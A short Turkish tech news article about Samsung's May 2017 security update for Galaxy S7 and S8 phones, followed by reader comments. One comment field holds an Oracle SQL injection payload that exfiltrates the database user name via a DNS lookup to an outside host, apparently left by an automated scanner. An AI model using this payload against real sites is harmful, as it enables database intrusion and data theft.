Samsung, Büyük Çaplı Bir Güncelleme Yayınlayacak!

Samsung, eski ve yeni amiral gemileri için büyük çaplı bir güncelleme yayınlayacak. Galaxy S8 ve S8 Plus modelini de kapsayacak olan güncellemenin detayları haberimizde...
04 Mayıs 2017 09:49
Samsung, Büyük Çaplı Bir Güncelleme Yayınlayacak!
Google, Android işletim sistemini daha güvenli hale getirmek için her ay düzenli güvenlik güncellemesi yayınlayacağını geçtiğimiz yıllarda duyurmuş ve bu politikasından taviz vermemişti. Samsung da Google'dan sonra Galaxy serisi için güvenlik güncellemesi yayınlamaya başlamıştı.
 
 
Samsung'un Mayıs ayı içerisinde yayınlayacağı güvenlik güncellemesinin detayları belli şimdiden belli oldu. Galaxy S7, Galaxy S7 edge, Galaxy S8 ve Galaxy S8 Plus modellerine gelecek olan güncelleme güvenlik odaklı olacak. Samsung Mobile'ın blogunda yer alan bilgilere göre 54 adet CVE güvenlik açığı ve 11 adet belli başlı güvenlik açıkları bu güncelleme ile kapatılacak.
 
Toplamda 65 güvenlik açığının kapatılması, uzun bir süredir Samsung cihazlarında güvenlik açığı var dedikodularının yalan olduğunu kanıtlayacaktır.
 
 
Güncelleme yayınlandığında muhtemelen bir bildirim alacaksınız. Eğer bildirim gelmezse Galaxy cihazınızın Ayarlar -> Yazılım güncelleme bölümünden en son güncellemeleri denetleyebilirsiniz.
 
teknolojioku
395815
'||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('bikuxjpichcasr0qqkwozdw9-wo7j3qkvojqvl8m'||'roq.r87.me') from DUAL))||'
04 Mayıs 2017, Perşembe 21:07
Not 5 güncelleme olacakmı
Bu haberler ilginizi çekebilir